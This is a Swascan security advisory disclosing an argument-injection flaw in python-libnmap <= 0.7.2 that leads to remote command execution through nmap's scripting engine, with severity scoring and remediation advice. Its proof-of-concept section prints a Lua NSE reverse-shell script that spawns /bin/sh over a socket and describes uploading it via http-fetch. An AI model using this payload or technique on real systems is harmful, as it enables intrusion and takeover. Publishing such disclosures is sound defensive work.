Security Advisory: Libnmap

Swascan Offensive Security Team has identified a severe vulnerability on the python-libnmap Python library (https://pypi.org/project/python-libnmap/).

Python-libnmap

python-libnmap is a python library, developed by Ronald Bister, enabling python developers o manipulate nmap process and data.

The library offers the following features:

automate or schedule nmap scans on a regular basis
manipulate nmap scans results to do reporting
compare and diff nmap scans to generate graphs
batch process scan reports
more…

Technical Summary

Swascan Offensive Security Team discovered an important vulnerability on python-libnmap <= 0.7.2.

Vulnerability	CVSSv3.1
python-libnmap <= 0.7.2 – Argument Injection to Remote Command Execution	9.0 – Critical [AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]

This library is vulnerable to an Argument Injection vulnerability leading to Remote Command Execution through the Nmap Scripting Language (NSE).

The Swascan Offensive Security Team recommends all the developers using this Python library to check for a fixed version and to follow our recommendations reported below to make sure that the potential risk is mitigated.

Vulnerability details

Critical python-libnmap <=0.7.2 – Argument Injection to Remote Command Execution

CWE-88:                             Argument Injection
CVSSv3.1:                           9.0 [ AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H ]
OWASP:                             A03:2021 – Injection
Remediation Complexity: HIGH

Description

The library is vulnerable to an Argument Injection vulnerability leading to Remote Command Execution.

When the client application fails to validate the user input, the library allows to inject arbitrary arguments in the final nmap command line being executed on the underlying Opearting System, leading to the upload and execution of a custom LUA script using the Nmap Scripting Language (NSE).

Proof of Concept

When spawning the nmap process, quotation is not closed correctly as shown in this PoC:

Evidence 1 Quotation not correctly closed by the library

If the client application does not correctly validate the targets argument value, a potential attacker could manipulate the nmap command line as shown in the following image:

Evidence 2 NSE reverse shell being uploaded on the target system using the http-fetch nmap script

Remote Code Execution becomes then possible using the http-fetch script, and by uploading and executing the following NSE reverse shell script:

local handle = io.popen(“python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\”127.0.0.1\”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\”/bin/sh\”,\”-i\”]);'”)

local result = handle:read(“*a”)

handle:close()

After having uploaded the NSE reverse shell on the target system, it can be executed:

Impact

When exploited, this vulnerability can cause the access to the underlying operating system and thus to the client application’s data with the application’s user privileges.

Remediation

At the time of writing, there is still not a remediation at the library level as the developer Ronald Bister has not released an update yet.

Developers using this Python library to make their nmap network or vulnerability scanning tasks must:

Update the library as soon as a newer version will be released;
Ensure that the targets argument value, when instantiating the NmapProcess class, is being correctly validated and does not contain invalid characters.

For a full remediation on the client application side, the targets argument value should be validated against the following use cases:

FQDNs
Simple hostnames (could be stored in /etc/hosts or completed by the domain or search suffix from resolv.conf)
IPv4+6
IPv4+6 CIDR notation
IPv4+6 series notation (e.g.: 192.138.5.1-5,8,9,266)